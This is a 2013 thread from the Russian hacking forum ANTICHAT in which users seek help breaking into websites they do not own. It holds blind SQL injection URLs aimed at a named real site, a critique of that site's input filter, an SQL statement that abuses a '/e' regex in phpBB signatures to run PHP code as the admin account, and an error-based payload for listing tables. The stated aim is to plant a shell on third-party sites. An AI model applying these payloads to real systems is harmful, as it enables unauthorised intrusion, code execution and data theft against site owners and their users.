ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.10.2013, 16:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
4404
Репутация:
0
|
|
Помогите раскрутить, через sqlmap не получается у меня.
info(.)dra(c)onic(.)ru/?part=npcs&id=95%27%22\%27\%22\ - без ( )
|
|
|
|
05.10.2013, 11:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
8396
Репутация:
6
|
|
Сообщение от psihoz26
psihoz26 said:
Код:
Code:
$result = mysql_query("SELECT * FROM profiles where login = '$username' and sa = '$otvet_na_vopros' and sq = '$u2'") or die("niiiii");
тут только в слепую крутить получается через benchmark
в других же случаях выдает niiiii =\
подскажите как ещё попробовать?? Зависит от того, что потом происходит с данными из $result.
Сообщение от Massay
Massay said:
Помогите раскрутить, через sqlmap не получается у меня.
info(.)dra(c)onic(.)ru/?part=npcs&id=95%27%22\%27\%22\ - без ( )
Запятые вырезаются
http://info.draconic.ru/?part=npcs&id=95 and mid(version()from 1 for 1)=5
|
|
|
|
05.10.2013, 15:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
4404
Репутация:
0
|
|
Перешел по ссылке ничего не произошло. Скажите пожалуйста можно розкрутить sql injection по моей ссылке. Если да, буду вам очень признателен за помощь.
|
|
|
|
05.10.2013, 15:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от Massay
Massay said:
Перешел по ссылке ничего не произошло. Скажите пожалуйста можно розкрутить sql injection по моей ссылке. Если да, буду вам очень признателен за помощь.
думаю , что нет
|
|
|
|
05.10.2013, 16:24
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Сообщение от Massay
Massay said:
Перешел по ссылке ничего не произошло. Скажите пожалуйста можно розкрутить sql injection по моей ссылке. Если да, буду вам очень признателен за помощь.
101% ничего не выйдет
|
|
|
05.10.2013, 16:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
8396
Репутация:
6
|
|
Сообщение от Massay
Massay said:
Перешел по ссылке ничего не произошло. Скажите пожалуйста можно розкрутить sql injection по моей ссылке. Если да, буду вам очень признателен за помощь.
Раскрутить можно как классическую слепую
Код:
Code:
function AntiInject($str, $max_len = 500)
{
$words = array("\\", "'", ",", ";", "--", "%20", "%27", "$", "*", "WHERE", "DELETE", "DROP", "SELECT", "UPDATE", "INSERT", "EXEC", "TRUNCATE", "SHUTDOWN", "");
/* replacing , ----->>*/ $str = trim(str_replace($words, "", $str));
if (strlen($str)>$max_len) $str = "";
return $str;
}
Доставило, что при проверке содержимое не приводится к общему регистру.
+
http://info.draconic.ru/?part=npcs&id=95 and mid((select version())from 1 for 1)=5
-
http://info.draconic.ru/?part=npcs&id=95 and mid((select version())from 1 for 1)=4
|
|
|
|
05.10.2013, 20:48
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от qaz
qaz said:
хотел короче залить шелл в phpbb3, пытаюсь разрешить в шаблонах выполнение php а в ответ ,,Найди другой форум, и ломай его, а от этого отъябись.,, )) мб есть другие способы? гугл не помог
попробуй через востонавление БД, создаешь файлик, в нем прописываешь:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]UPDATE nuke_bbusers SET user_sig_bbcode_uid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'(.+)/e\0'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user_sig[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'phpbb:phpinfo()'[/COLOR][COLOR="#0000BB"]WHERE user_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
потом идешь в профиль аккаунта и смотришь выполнится ли пхпинфо user_id=2 это акк к которому есть доступ, по умолчанию админский прописан...
|
|
|
|
05.10.2013, 21:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от winstrool
winstrool said:
попробуй через востонавление БД, создаешь файлик, в нем прописываешь:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]UPDATE nuke_bbusers SET user_sig_bbcode_uid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'(.+)/e\0'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user_sig[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'phpbb:phpinfo()'[/COLOR][COLOR="#0000BB"]WHERE user_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
потом идешь в профиль аккаунта и смотришь выполнится ли пхпинфо
user_id=2
это акк к которому есть доступ, по умолчанию админский прописан... перерыл всю админку, нема в третей версии возможности загрузить файл для востановления БД
|
|
|
|
05.10.2013, 23:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
7287
Репутация:
0
|
|
Сообщение от Inoms
Inoms said:
Юнион там без полезен, он ничего не отображает, работает только по ошибкам всё.
ЗЫ: union select+1,2,3,4,count(*),concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x -- t
Растолкуйте пожалуйста запрос:
concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2))
что он делает? по идее вроде после 0x3a ожидается ввод параметра или нет?
и для чего здесь count(*)?
|
|
|
|
06.10.2013, 00:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от kilo_star
kilo_star said:
Растолкуйте пожалуйста запрос:
concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2))
что он делает? по идее вроде после 0x3a ожидается ввод параметра или нет?
и для чего здесь count(*)?
запрос выбирает таблицы из текущей базы
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
